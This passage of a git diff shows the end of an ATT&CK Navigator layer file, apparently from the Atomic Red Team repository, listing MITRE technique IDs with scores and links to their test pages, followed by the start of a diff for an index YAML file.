Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..167324d3 100644 --- 